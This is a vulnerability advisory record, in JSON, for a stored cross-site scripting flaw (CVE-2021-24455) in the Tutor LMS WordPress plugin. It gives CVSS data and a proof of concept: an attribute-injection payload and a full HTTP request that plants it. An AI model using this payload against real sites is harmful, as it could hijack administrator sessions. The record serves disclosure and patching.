The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.
{"id": "WPEX-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)", "description": "The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.\n", "published": "2021-06-28T00:00:00", "modified": "2021-08-10T07:05:26", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Phu Tran", "references": [], "cvelist": ["CVE-2021-24455"], "immutableFields": [], "lastseen": "2021-09-14T23:17:54", "viewCount": 37, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24455"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24455"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceData": "As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: \" style=\"animation-name:rotation\" onanimationstart=\"alert(/XSS/)//\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 341\r\nConnection: close\r\nCookie: [Tutor Instructor+]\r\n\r\n_tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create", "generation": 0, "_state": {"dependencies": 1646351643}}
{"wpvulndb": [{"lastseen": "2021-09-14T23:17:54", "description": "The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.\n\n### PoC\n\nAs a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: \" style=\"animation-name:rotation\" onanimationstart=\"alert(/XSS/)// POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 341 Connection: close Cookie: [Tutor Instructor+] _tutor_nonce=52e764441f&tutor;_announcement_course=973&tutor;_announcement_title=Test+Inst+XSS&tutor;_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action;=tutor_announcement_create&action;_type=create\n", "cvss3": {}, "published": "2021-06-28T00:00:00", "type": "wpvulndb", "title": "Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24455"], "modified": "2021-08-10T07:05:26", "id": "WPVDB-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9", "href": "https://wpscan.com/vulnerability/9ef14cf1-1e04-4125-a296-9aa5388612f9", "sourceData": "", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:55:00", "description": "The Tutor LMS \u00e2\u20ac\u201c eLearning and online course solution WordPress plugin before 1.9.2 did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-08-02T11:15:00", "type": "cve", "title": "CVE-2021-24455", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24455"], "modified": "2021-08-10T01:23:00", "cpe": [], "id": "CVE-2021-24455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24455", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}]}